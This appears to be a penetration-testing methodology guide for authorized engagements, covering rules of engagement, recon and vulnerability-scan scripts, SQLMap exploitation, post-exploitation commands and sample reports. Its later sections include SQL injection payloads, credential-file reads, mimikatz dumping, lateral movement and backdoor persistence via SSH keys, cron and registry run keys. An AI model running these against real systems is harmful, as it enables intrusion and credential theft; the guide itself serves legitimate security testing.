Key Questions to Address:

Business Objectives:
- What are you trying to protect?
- What are your primary security concerns?
- What prompted this assessment?
- What compliance requirements exist?
- What is the business impact of potential breaches?

Technical Scope:
- Which systems, applications, and networks are in scope?
- Are there any systems explicitly out of scope?
- What access level will be provided (black/grey/white box)?
- Are social engineering and physical security in scope?
- What geographic locations are involved?

Timing:
- What is the desired timeline?
- Are there blackout periods to avoid?
- What hours are permitted for testing?
- What is the expected duration?

Constraints:
- Are there bandwidth limitations?
- Are production systems to be tested?
- Are there systems that cannot be tested?
- What level of testing is permitted (non-invasive, invasive)?

## Rules of Engagement Template

### Scope Definition
**In-Scope Assets:**
- 192.168.1.0/24 network range
- example.com and all subdomains
- Mobile applications: iOS and Android
- Physical location: Main office only

**Out-of-Scope:**
- Third-party hosted services
- Partner networks
- Customer data (unless test accounts)

### Testing Windows
- Preferred: Monday-Friday, 9 AM - 5 PM EST
- Blackout: December 20-31 (holiday freeze)
- Extended hours: Require 24-hour notice

### Approved Techniques
✅ Network scanning and enumeration
✅ Vulnerability exploitation (non-DoS)
✅ Web application testing
✅ Wireless assessment (internal only)
✅ Social engineering (email phishing only)

❌ Denial of service attacks
❌ Physical intrusion without escort
❌ Accessing customer data
❌ Testing third-party systems

### Communication Protocol
**Primary Contact:** [email protected]
**Emergency Contact:** +1-555-123-4567 (24/7)
**Status Updates:** Daily summary at 5 PM EST
**Immediate Notification Required For:**
- Critical vulnerabilities discovered
- System instability observed
- Law enforcement contact
- Testing detected and blocked

### Data Handling
- All findings confidential and encrypted
- No data exfiltration beyond PoC screenshots
- Secure deletion after reporting
- NDA in effect for 3 years

### Liability and Insurance
- $2M professional liability coverage
- Client assumes risk for authorized testing
- Tester not liable for system failures during approved testing

1. Master Services Agreement (MSA)
   - General terms and conditions
   - Payment terms
   - Intellectual property rights
   - Liability limitations

2. Statement of Work (SOW)
   - Specific engagement details
   - Deliverables
   - Timeline and milestones
   - Pricing

3. Non-Disclosure Agreement (NDA)
   - Confidentiality obligations
   - Duration of confidentiality
   - Exceptions

4. Authorization Letter
   - Explicit permission to test
   - Signed by authorized representative
   - Includes scope and testing windows
   - Legal protection for tester

5. Get-Out-Of-Jail-Free Letter
   - Emergency contact information
   - Authorization verification
   - Carry during physical assessments

# Create project structure
mkdir -p pentest_project/{recon,scanning,exploitation,loot,reports,scripts}

## Initialize documentation
cat > pentest_project/README.md << 'EOF'
## Penetration Test: [Client Name]
Date: [Start Date] - [End Date]
Tester: [Name]

## Scope
- Target: [Systems/Networks]
- Type: [Black/Grey/White Box]
- Duration: [Days]

## Status
- [ ] Pre-engagement complete
- [ ] Information gathering
- [ ] Vulnerability assessment
- [ ] Exploitation
- [ ] Post-exploitation
- [ ] Reporting

## Critical Findings
(Document as discovered)

## Access Credentials
(Secure storage location)
EOF

## Set up note-taking
cherrytree pentest_notes.ctb &

## Configure tools
## Metasploit workspace
msfconsole -q -x "workspace -a client_name; exit"

## Burp Suite project
## Create new project: client_name.burp

#!/bin/bash
## passive_recon.sh

TARGET="example.com"
OUTPUT_DIR="recon/passive"

mkdir -p $OUTPUT_DIR

echo "[+] Starting passive reconnaissance on $TARGET"

## WHOIS information
echo "[+] WHOIS lookup..."
whois $TARGET > $OUTPUT_DIR/whois.txt

## DNS information
echo "[+] DNS enumeration..."
dig $TARGET ANY > $OUTPUT_DIR/dns_any.txt
dig $TARGET MX > $OUTPUT_DIR/dns_mx.txt
dig $TARGET TXT > $OUTPUT_DIR/dns_txt.txt

## Subdomain enumeration
echo "[+] Subdomain discovery..."
theHarvester -d $TARGET -b all -f $OUTPUT_DIR/theharvester
sublist3r -d $TARGET -o $OUTPUT_DIR/sublist3r.txt

## Certificate transparency
echo "[+] Certificate transparency logs..."
curl -s "https://crt.sh/?q=%25.$TARGET&output=json" | jq -r '.[].name_value' | sort -u > $OUTPUT_DIR/crtsh.txt

## Web archive
echo "[+] Historical data..."
curl -s "http://web.archive.org/cdx/search/cdx?url=*.$TARGET&output=json&fl=original&collapse=urlkey" > $OUTPUT_DIR/wayback.json

## Social media
echo "[+] Social media intelligence..."
## Manual: LinkedIn, Twitter, Facebook
## Document employees, technologies, relationships

## Technology fingerprinting
echo "[+] Technology identification..."
whatweb $TARGET > $OUTPUT_DIR/whatweb.txt

## Email harvesting
echo "[+] Email harvesting..."
theHarvester -d $TARGET -b google,bing,linkedin -f $OUTPUT_DIR/emails

echo "[+] Passive reconnaissance complete. Results in $OUTPUT_DIR/"

#!/bin/bash
## active_recon.sh

TARGET="192.168.1.0/24"
DOMAIN="example.com"
OUTPUT_DIR="recon/active"

mkdir -p $OUTPUT_DIR

echo "[+] Starting active reconnaissance"

## Host discovery
echo "[+] Host discovery..."
nmap -sn $TARGET -oA $OUTPUT_DIR/host_discovery

## Port scanning
echo "[+] Port scanning..."
nmap -p- -T4 -sV -sC -oA $OUTPUT_DIR/full_scan $TARGET

## Service enumeration
echo "[+] Service enumeration..."
nmap -sV --script=banner,*-enum -oA $OUTPUT_DIR/service_enum $TARGET

## Web service discovery
echo "[+] Web service identification..."
cat $OUTPUT_DIR/full_scan.gnmap | grep "80/open\|443/open\|8080/open" | awk '{print $2}' > $OUTPUT_DIR/web_hosts.txt

## Screenshot web services
echo "[+] Taking screenshots..."
eyewitness -f $OUTPUT_DIR/web_hosts.txt -d $OUTPUT_DIR/screenshots

## Directory enumeration
echo "[+] Directory enumeration (background)..."
while read host; do
    gobuster dir -u "http://$host" -w /usr/share/wordlists/dirb/common.txt -o "$OUTPUT_DIR/gobuster_$host.txt" &
done < $OUTPUT_DIR/web_hosts.txt

echo "[+] Active reconnaissance in progress. Check $OUTPUT_DIR/ for results."

## Attack Surface Analysis

## External Assets
- 15 web applications identified
- 8 mail servers discovered
- 3 VPN endpoints found
- 12 subdomains enumerated

## Technologies Detected
- Apache 2.4.41 (potentially outdated)
- PHP 7.2 (end of life)
- WordPress 5.8 (plugins outdated)
- Microsoft Exchange 2016
- Cisco ASA 5505

## Potential Attack Vectors
1. Outdated WordPress plugins → RCE
2. Exposed admin panels → Credential attacks
3. Missing security headers → XSS potential
4. Open SMB shares → Information disclosure
5. Weak SSL/TLS configuration → MITM attacks

## Priority Targets
1. admin.example.com - Admin portal, high value
2. mail.example.com - Exchange server, potential for lateral movement
3. vpn.example.com - Remote access, critical entry point

#!/bin/bash
## vulnerability_scan.sh

TARGET="192.168.1.0/24"
OUTPUT_DIR="scanning/vulnerabilities"

mkdir -p $OUTPUT_DIR

echo "[+] Starting vulnerability assessment"

## Nmap vulnerability scripts
echo "[+] Running Nmap vuln scripts..."
nmap --script vuln -oA $OUTPUT_DIR/nmap_vulnscan $TARGET

## Nikto web scanning
echo "[+] Scanning web applications..."
while read webhost; do
    nikto -h $webhost -o $OUTPUT_DIR/nikto_$webhost.txt
done < recon/active/web_hosts.txt

## Nuclei scanning
echo "[+] Running Nuclei templates..."
nuclei -l recon/active/web_hosts.txt -t nuclei-templates/ -o $OUTPUT_DIR/nuclei_results.txt

## SSL/TLS testing
echo "[+] SSL/TLS configuration testing..."
sslscan --show-certificate $TARGET > $OUTPUT_DIR/sslscan.txt

## WordPress scanning (if applicable)
echo "[+] WordPress scanning..."
wpscan --url http://example.com --enumerate vp,vt,u --api-token YOUR_TOKEN -o $OUTPUT_DIR/wpscan.txt

echo "[+] Vulnerability assessment complete. Review $OUTPUT_DIR/"

## Web application manual testing checklist

## Authentication
- [ ] Weak password policy
- [ ] Username enumeration
- [ ] Brute force protection
- [ ] Password reset security
- [ ] Session management
- [ ] Multi-factor authentication bypass

## Authorization
- [ ] Horizontal privilege escalation
- [ ] Vertical privilege escalation
- [ ] Direct object reference
- [ ] Function-level access control

## Input Validation
- [ ] SQL injection (all parameters)
- [ ] Cross-site scripting (reflected, stored, DOM)
- [ ] Command injection
- [ ] Path traversal
- [ ] XML external entities
- [ ] Server-side request forgery
- [ ] Template injection
- [ ] LDAP injection

## Configuration
- [ ] Default credentials
- [ ] Directory listing
- [ ] Verbose error messages
- [ ] Security headers missing
- [ ] Unnecessary services exposed
- [ ] Outdated software versions

## Logic Flaws
- [ ] Business logic bypass
- [ ] Payment manipulation
- [ ] Race conditions
- [ ] Time-of-check-time-of-use

Vulnerability Prioritization Matrix:

Critical (CVSS 9.0-10.0):
- Unauthenticated remote code execution
- SQL injection with admin access
- Exposed administrative interfaces
→ Immediate exploitation attempt

High (CVSS 7.0-8.9):
- Authenticated RCE
- Privilege escalation to admin
- Sensitive data exposure
→ Exploitation after critical items

Medium (CVSS 4.0-6.9):
- Limited data exposure
- DoS vulnerabilities
- Missing security features
→ Document and test if time permits

Low (CVSS 0.1-3.9):
- Information disclosure (non-sensitive)
- Minor configuration issues
→ Document only, no active testing

## Exploitation Plan

## Target: admin.example.com
**Vulnerability:** SQL Injection in user search
**Severity:** Critical
**CVSS:** 9.8

### Exploitation Steps:
1. Confirm vulnerability with SQLMap
2. Extract database schema
3. Dump admin credentials
4. Crack password hashes
5. Login to admin panel
6. Document access level

### Success Criteria:
- Admin panel access achieved
- Demonstrate data access
- Screenshot proof of concept
- No system damage

### Rollback Plan:
- No data modification
- No account lockouts
- Clean up test accounts
- Remove uploaded files

### Safety Measures:
- Read-only SQL queries only
- Backup before testing
- Test during approved window
- Monitor for system issues

## SQL Injection exploitation example

## Confirm vulnerability
sqlmap -u "http://admin.example.com/search?user=test" --batch

## Enumerate databases
sqlmap -u "http://admin.example.com/search?user=test" --dbs --batch

## Get tables
sqlmap -u "http://admin.example.com/search?user=test" -D webapp --tables --batch

## Dump credentials
sqlmap -u "http://admin.example.com/search?user=test" -D webapp -T users --dump --batch

## Save results
mv ~/.sqlmap/output/admin.example.com exploitation/sqli_admin_portal/

## Linux post-exploitation

## System information
uname -a
cat /etc/issue
hostname
cat /proc/version

## User information
id
whoami
cat /etc/passwd
cat /etc/group
sudo -l

## Network information
ifconfig
ip addr
netstat -antp
ss -antp

## Interesting files
find / -name "*.conf" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find /home -name "*.txt" 2>/dev/null
cat ~/.bash_history

## Privilege escalation enumeration
./linpeas.sh
./linux-exploit-suggester.sh

## Lateral movement opportunities
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts
cat ~/.ssh/config

## Establish persistence (for demonstration)

## Linux SSH backdoor (remove after testing)
mkdir -p ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

## Cron job (for PoC)
(crontab -l 2>/dev/null; echo "@reboot /tmp/backdoor.sh") | crontab -

## Windows registry run key (for PoC)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

## Document and remove all persistence mechanisms before engagement ends

## Credential harvesting
mimikatz.exe
sekurlsa::logonpasswords
sekurlsa::tickets

## Network scanning from compromised host
nmap -sn 10.10.10.0/24

## Impacket lateral movement
psexec.py domain/user:[email protected]
wmiexec.py domain/user:[email protected]

## SSH key usage
ssh -i stolen_key [email protected]

## Document all lateral movement paths

## Demonstrate access to sensitive data (screenshots only)

## Database access
mysql -u admin -ppassword -e "SELECT * FROM customers LIMIT 5;"

## File system access
ls -la /var/www/sensitive_docs/
head -5 /var/www/sensitive_docs/confidential.pdf

## API access
curl -H "Authorization: Bearer $TOKEN" https://api.example.com/v1/users

## Screenshot evidence only - no data exfiltration
screencapture evidence_database_access.png

## Executive Summary

## Assessment Overview
From November 1-15, 2024, [Your Company] conducted a comprehensive penetration 
test of Example Corp's external-facing applications and network infrastructure.

## Key Findings
- **5 Critical vulnerabilities** requiring immediate attention
- **12 High-risk issues** that could lead to data breaches
- **8 Medium-risk** configuration problems
- **15 Low-risk** informational findings

## Business Impact
The identified vulnerabilities could allow an attacker to:
1. Gain administrative access to customer database (500,000 records)
2. Execute arbitrary code on web servers
3. Access sensitive employee and financial data
4. Pivot into internal network segments
5. Establish persistent backdoor access

**Estimated Business Impact:** $2.5M - $5M based on breach cost calculations

## Risk Rating
**Overall Risk: HIGH**

Without remediation, Example Corp faces:
- Data breach affecting customer PII
- Regulatory compliance violations (GDPR, PCI-DSS)
- Reputational damage
- Financial penalties

## Recommendations
1. **Immediate** (0-7 days): Patch critical RCE vulnerabilities
2. **Short-term** (1-4 weeks): Implement WAF, update frameworks
3. **Medium-term** (1-3 months): Security awareness training, code review
4. **Long-term** (3-12 months): Security architecture review, DevSecOps

## Positive Findings
- Effective network segmentation
- Strong password policy enforced
- Security monitoring in place
- Rapid incident response capabilities

## Finding: SQL Injection in User Search

## Vulnerability Details
**Title:** SQL Injection in User Search Functionality
**Severity:** Critical (CVSS 9.8)
**Affected System:** admin.example.com
**Affected Component:** /api/v1/users/search
**Vulnerability Type:** CWE-89: SQL Injection

## Description
The user search functionality is vulnerable to SQL injection through the 
`username` parameter. The application fails to properly sanitize user input, 
allowing attackers to inject arbitrary SQL commands.

## Technical Details
**Vulnerable Parameter:** username
**Injection Point:** GET /api/v1/users/search?username=VALUE
**Database Type:** MySQL 5.7.33
**Web Server:** Apache 2.4.41
**Application:** PHP 7.2.34

## Proof of Concept
```bash
## Test for vulnerability
curl "http://admin.example.com/api/v1/users/search?username=admin' OR '1'='1"

## Extract database version
curl "http://admin.example.com/api/v1/users/search?username=admin' UNION SELECT @@version--"

## Dump user table
sqlmap -u "http://admin.example.com/api/v1/users/search?username=test" --dump -D webapp -T users

$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ?');
$stmt->execute([$username]);

$username = filter_var($username, FILTER_SANITIZE_STRING);
if (!preg_match('/^[a-zA-Z0-9_]+$/', $username)) {
    throw new Exception('Invalid username format');
}

## Retest Results

## Date: December 1, 2024
## Tester: [Name]

## Remediation Status

### Critical Findings
1. **SQL Injection (admin portal)** - ✅ FIXED
   - Prepared statements implemented
   - Input validation added
   - Confirmed not exploitable
   
2. **RCE via file upload** - ✅ FIXED
   - File type validation implemented
   - Upload directory secured
   - Cannot execute uploaded files
   
3. **Default credentials** - ✅ FIXED
   - Default accounts removed
   - Strong passwords enforced

### Remaining Issues
4. **Insecure API endpoint** - ⚠️ PARTIALLY FIXED
   - Authentication added
   - Rate limiting still missing
   - Recommend: Implement rate limiting

5. **Weak SSL configuration** - ❌ NOT FIXED
   - Still using TLS 1.0
   - Weak ciphers enabled
   - Recommend: Update to TLS 1.2+

## Overall Assessment
**70% of critical and high findings remediated**
**Remaining risk: MEDIUM**

Client has made significant progress. Recommend quarterly
penetration testing to maintain security posture.

## Prepare for client presentation

## Create slide deck covering:
- Methodology overview
- Key findings
- Attack demonstrations
- Remediation guidance
- Q&A session

## Hands-on workshop:
- Demonstrate exploitation
- Walk through fixes
- Answer technical questions
- Provide tool recommendations

## Internal Debrief

## What Went Well
- Comprehensive reconnaissance uncovered hidden assets
- SQL injection led to full database compromise
- Client responsive to critical findings
- Good communication throughout engagement

## Challenges
- Network instability during scanning
- Limited testing window
- Some systems unavailable for testing
- False positives in automated scans

## Improvements for Next Time
- Request more detailed asset inventory upfront
- Build in buffer time for retesting
- Implement better scan throttling
- Enhance automated scanning accuracy

## Tools Evaluation
- Nmap: Excellent, no issues
- SQLMap: Found SQLi but noisy
- Burp Suite: Essential for web testing
- Nuclei: Fast but many false positives

✓ Always obtain written authorization
✓ Stay within defined scope
✓ Report critical findings immediately
✓ Protect client confidentiality
✓ Don't access more data than necessary for PoC
✓ Clean up testing artifacts
✓ Follow coordinated disclosure
✓ Maintain professional integrity

✗ Never test without authorization
✗ Don't exceed scope boundaries
✗ Don't exploit for personal gain
✗ Don't publicly disclose without permission
✗ Don't cause unnecessary system damage
✗ Don't ignore safety protocols

## Report review checklist

Technical Accuracy:
- [ ] All findings verified and reproducible
- [ ] CVSS scores calculated correctly
- [ ] Technical details accurate
- [ ] Remediation advice sound

Completeness:
- [ ] All in-scope assets tested
- [ ] Evidence screenshots included
- [ ] Proof of concept code provided
- [ ] References cited

Clarity:
- [ ] Executive summary for non-technical audience
- [ ] Technical details for engineers
- [ ] Clear remediation steps
- [ ] No jargon without explanation

Professional:
- [ ] Grammar and spelling correct
- [ ] Consistent formatting
- [ ] Professional tone throughout
- [ ] Branded template used